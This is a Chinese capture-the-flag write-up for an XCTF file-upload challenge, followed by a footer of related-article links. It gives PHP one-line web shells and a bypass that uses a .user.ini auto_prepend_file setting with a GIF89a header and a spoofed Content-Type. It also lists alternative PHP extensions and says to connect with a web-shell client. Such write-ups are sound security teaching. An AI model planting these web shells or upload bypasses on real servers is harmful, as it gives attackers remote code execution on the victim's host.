攻防世界35-easyupload-CTFWeb

攻防世界35-easyupload-CTFWeb

通过各种上传发现,过滤了php后缀和内容中有php的文件

有这几种方式上传一句话木马

复制代码
<script language="php">eval($_POST[1]);</script>
<?php eval($_POST['cmd']);?>
<?= eval($_POST['cmd']);?>

那么如果过滤php的话只能用最后一种方式

上传时也要注意Content-Type: text/jpg

上传名称后缀为.phtml .phps .php5 .pht等(可以自行FUZZ测试,自己找字典)

这题我不会做,也是看题解的

学会一种新方式:

.user.ini绕过

.user.ini中两个中的配置就是auto_prepend_file和auto_append_file。这两个配置的意思就是:我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。这两个设置的区别只是在于auto_prepend_file是在文件前插入,auto_append_file在文件最后插入。

利用.user.ini的前提是服务器开启了CGI或者FastCGI ,并且上传文件的存储路径下有index.php可执行文件。

所以本题我们要想上传并且执行,首先上传.user.ini文件,然后上传一个图片。

可以新建.user.ini文件,内容如下

复制代码
GIF89a
auto_prepend_file=a.jpg

上传并更改Content-Type: image/jpeg

然后创建a.jpg,内容为

复制代码
GIF89a
<?=eval($_REQUEST['cmd']);?>

用蚁剑连接即可
<?=eval($_REQUEST['cmd']);?>

复制代码
用蚁剑连接即可

![image-20241110152027401](https://img-blog.csdnimg.cn/img_convert/2201b0243af346f87c1e51fb8fc5c786.png)
相关推荐
Paranoid-up1 小时前
安全启动和安全固件更新(SBSFU)12: 调试 / 移植
安全·iap·安全启动·安全升级·sbsfu
介一安全1 小时前
【案例分析】网盘高危漏洞深度剖析:存储型XSS与CSRF的组合攻击
网络·xss·csrf
呉師傅1 小时前
将CD音频抓轨转换成MP3的两种方法【图文解释】
运维·服务器·网络·windows·电脑·音视频
Soonyang Zhang1 小时前
nccl分析(二)——RDMA带外建链过程
网络·nccl·集合通信
@insist1231 小时前
信息安全工程师-操作系统安全通用基础与七大核心机制
安全·软考·信息安全工程师·软件水平考试
一路往蓝-Anbo1 小时前
第一章:嵌入式TDD-环境搭建
网络·stm32·单片机·嵌入式硬件·tdd
闵孚龙1 小时前
AI Agent 提示注入防御全解析:Unicode 清洗、MCP 安全、Claude Code 权限治理与纵深防御
人工智能·安全
蚰蜒螟1 小时前
深入剖析 OpenJDK 17 解释器中的安全点(Safepoint)进入与退出机制
java·开发语言·安全
txg6661 小时前
网络安全领域简报(2026年5月9日—5月16日)
安全·web安全
H Journey1 小时前
TCP断开连接四次挥手
网络·tcp/ip·四次挥手